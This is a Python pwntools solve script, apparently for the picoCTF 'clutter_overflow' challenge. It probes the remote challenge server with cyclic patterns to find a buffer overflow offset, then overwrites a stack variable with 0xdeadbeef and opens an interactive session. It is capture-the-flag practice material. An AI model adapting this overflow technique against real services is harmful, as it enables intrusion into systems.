picoCTF/clutter_overflow/sol.py

#!/usr/bin/env python
from pwn import *

def get_conn():
    #return process("./chall")
    return remote("mars.picoctf.net", 31890)

def try_memory_offset(offset):
    cycle = cyclic(length=offset, n=8)

    conn = get_conn()
    
    conn.recvuntil(b"see?")
    conn.recvline()
    
    conn.sendline(cycle)
    conn.recvuntil(b"== ")
    result = conn.recvline(keepends=False)

    conn.close()
    
    return result

base = 0x100
exp = 0
p = log.progress("searching for variable offset")
while True:
    offset = base + 2**exp
    p.status(f"trying offset {offset}")
    try:
        result = try_memory_offset(offset)
    except:
        base = base + 2**(exp-1)
        exp = 0
        continue
    if result != b"0x0":
        next_result = 0
        i = 0
        while result != next_result:
            i += 1
            result = next_result
            next_result = try_memory_offset(offset+i)
        offset = cyclic_find(int(result, 16), n=8)
        p.success(f"found result {unhex(result[2:])} at offset {offset}")
        break
    exp += 1

conn = get_conn()

conn.recvuntil(b"see?")
conn.recvline()

conn.sendline(b"a"*offset + p64(0xdeadbeef))
conn.interactive()